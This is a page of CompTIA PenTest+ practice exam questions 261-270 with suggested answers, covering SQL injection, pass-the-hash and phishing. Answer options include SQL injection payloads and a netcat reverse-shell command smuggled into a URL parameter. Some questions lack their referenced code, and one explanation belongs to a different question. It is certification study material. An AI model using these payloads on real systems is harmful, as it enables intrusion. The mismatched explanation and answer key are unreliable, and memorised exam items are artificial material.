ExamGecko
Search Search Login
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 27

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?
Given the following user-supplied data: www.comptia.com/info.php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing?
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section. Output 1
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
A penetration tester is reviewing the logs of a proxy server and discovers the following URLs: https://test.comptia.com/profile.php?userid=1546 https://test.cpmptia.com/profile.php?userid=5482 https://test.comptia.com/profile.php?userid=3618 Which of the following types of vulnerabilities should be remediated?
A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output: [ATTEMPT] target 192.168.1.112 - login 'root' - pass 'abcde' [ATTEMPT] target 192.168.1.112 - login 'root' - pass 'edcfg' [ATTEMPT] target 192.168.1.112 - login 'root' - pass 'qazsw' [ATTEMPT] target 192.168.1.112 - login 'root' -- pass ''tyuio'' Which of the following is the penetration tester conducting?
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?

Question 261

Report
Export
Collapse

Given the following code:

Which of the following data structures is systems?

A.
A tuple
A.
A tuple
Answers
B.
A tree
B.
A tree
Answers
C.
An array
C.
An array
Answers
D.
A dictionary
D.
A dictionary
Answers
Suggested answer: D

Explanation:

A dictionary is a data structure in Python that stores key-value pairs, where each key is associated with a value. A dictionary is created by enclosing the key-value pairs in curly braces and separating them by commas. A dictionary can be accessed by using the keys as indexes or by using methods such as keys(), values(), or items(). In the code, systems is a dictionary that has four key-value pairs, each representing an IP address and its corresponding operating system. A tuple is a data structure in Python that stores an ordered sequence of immutable values, enclosed in parentheses and separated by commas. A tree is a data structure that consists of nodes connected by edges, forming a hierarchical structure with a root node and leaf nodes. An array is a data structure that stores a collection of elements of the same type in a contiguous memory location.

Question 262

Report
Export
Collapse

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A.
Network segmentation
A.
Network segmentation
Answers
B.
Key rotation
B.
Key rotation
Answers
C.
Encrypted passwords
C.
Encrypted passwords
Answers
D.
Patch management
D.
Patch management
Answers
Suggested answer: D

Explanation:

Patch management is the process of identifying, downloading, and installing security patches for a system in order to address new vulnerabilities and software exploits. In the case of EternalBlue, the vulnerability was addressed by Microsoft in the form of a security patch. Installing this patch on the vulnerable host will provide protection from the vulnerability. Additionally, organizations should implement a patch management program to regularly check for and install security patches for the systems in their environment.

Network segmentation (A) can limit the impact of a compromise by separating different parts of the network into smaller, more isolated segments. However, it does not address the vulnerability itself. Key rotation (B) is the process of periodically changing cryptographic keys, which can help protect against attacks that rely on stolen or compromised keys. However, it is not directly related to the EternalBlue vulnerability.

Encrypted passwords (C) can help protect user credentials in case of a data breach or other compromise, but it does not prevent attackers from exploiting the EternalBlue vulnerability.

Reference: CompTIA PenTest+ Certification Guide, Chapter 1: Pre-engagement Interactions, Page 21.

Question 263

Report
Export
Collapse

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted.

Which of the following BEST identifies this concept?

A.
Statement of work
A.
Statement of work
Answers
B.
Program scope
B.
Program scope
Answers
C.
Non-disclosure agreement
C.
Non-disclosure agreement
Answers
D.
Rules of engagement
D.
Rules of engagement
Answers
Suggested answer: D

Explanation:

Rules of engagement (ROE) is a document that outlines the specific guidelines and limitations of a penetration test engagement. The document is agreed upon by both the penetration testing team and the client and sets expectations for how the test will be conducted, what systems are in scope, what types of attacks are allowed, and any other parameters that need to be defined. ROE helps to ensure that the engagement is conducted safely, ethically, and with minimal disruption to the client's operations.

Question 264

Report
Export
Collapse

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A.
Use Patator to pass the hash and Responder for persistence.
A.
Use Patator to pass the hash and Responder for persistence.
Answers
B.
Use Hashcat to pass the hash and Empire for persistence.
B.
Use Hashcat to pass the hash and Empire for persistence.
Answers
C.
Use a bind shell to pass the hash and WMI for persistence.
C.
Use a bind shell to pass the hash and WMI for persistence.
Answers
D.
Use Mimikatz to pass the hash and PsExec for persistence.
D.
Use Mimikatz to pass the hash and PsExec for persistence.
Answers
Suggested answer: D

Explanation:

Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials. This provides the tester with persistence on the system, allowing them to access it even after a reboot.

"A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)

Question 265

Report
Export
Collapse

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A.
A vulnerability scan
A.
A vulnerability scan
Answers
B.
A WHOIS lookup
B.
A WHOIS lookup
Answers
C.
A packet capture
C.
A packet capture
Answers
D.
An Nmap scan
D.
An Nmap scan
Answers
Suggested answer: A

Explanation:

A vulnerability scan is a type of penetration testing tool that is used to scan a network for vulnerabilities. A vulnerability scan can detect misconfigurations, missing patches, and other security issues that could be exploited by attackers. In this case, the output shows that 100 hosts had findings due to improper patch management, which means that the tester performed a vulnerability scan.

Question 266

Report
Export
Collapse

After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

A.
smbspool //192.160.100.56/print$
A.
smbspool //192.160.100.56/print$
Answers
B.
net rpc share -S 192.168.100.56 -U ''
B.
net rpc share -S 192.168.100.56 -U ''
Answers
C.
smbget //192.168.100.56/web -U ''
C.
smbget //192.168.100.56/web -U ''
Answers
D.
smbclient //192.168.100.56/web -U '' -N
D.
smbclient //192.168.100.56/web -U '' -N
Answers
Suggested answer: D

Explanation:

A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.

Question 267

Report
Export
Collapse

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A.
Badge cloning
A.
Badge cloning
Answers
B.
Watering-hole attack
B.
Watering-hole attack
Answers
C.
Impersonation
C.
Impersonation
Answers
D.
Spear phishing
D.
Spear phishing
Answers
Suggested answer: D

Explanation:

Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system.

Question 268

Report
Export
Collapse

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

Which of the following should the penetration tester attempt NEXT?

A.
http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
A.
http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
Answers
B.
http://company.com/catalog.asp?productid=22' OR 1=1 --
B.
http://company.com/catalog.asp?productid=22' OR 1=1 --
Answers
C.
http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
C.
http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
Answers
D.
http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
D.
http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
Answers
Suggested answer: C

Explanation:

This URL will attempt a SQL injection attack using a UNION operator to combine the results of two queries into one table. The attacker can use this technique to retrieve data from other tables in the database that are not normally accessible through the web application.

Question 269

Report
Export
Collapse

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A.
window.location.= 'https://evilcorp.com'
A.
window.location.= 'https://evilcorp.com'
Answers
B.
crossDomain: true
B.
crossDomain: true
Answers
C.
geturlparameter ('username')
C.
geturlparameter ('username')
Answers
D.
redirectUrl = 'https://example.com'
D.
redirectUrl = 'https://example.com'
Answers
Suggested answer: B

Question 270

Report
Export
Collapse

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A.
The web server is using a WAF.
A.
The web server is using a WAF.
Answers
B.
The web server is behind a load balancer.
B.
The web server is behind a load balancer.
Answers
C.
The web server is redirecting the requests.
C.
The web server is redirecting the requests.
Answers
D.
The local antivirus on the web server Is rejecting the connection.
D.
The local antivirus on the web server Is rejecting the connection.
Answers
Suggested answer: A

Explanation:

A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks.

If a WAF detects an attack, it will often reset the TCP connection, causing the connection to be terminated. As a result, a penetration tester may see TCP resets when a WAF is present. Therefore, the most likely reason for the TCP resets returning from the web server is that the web server is using a WAF.

Total 422 questions
Go to page: of 43
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms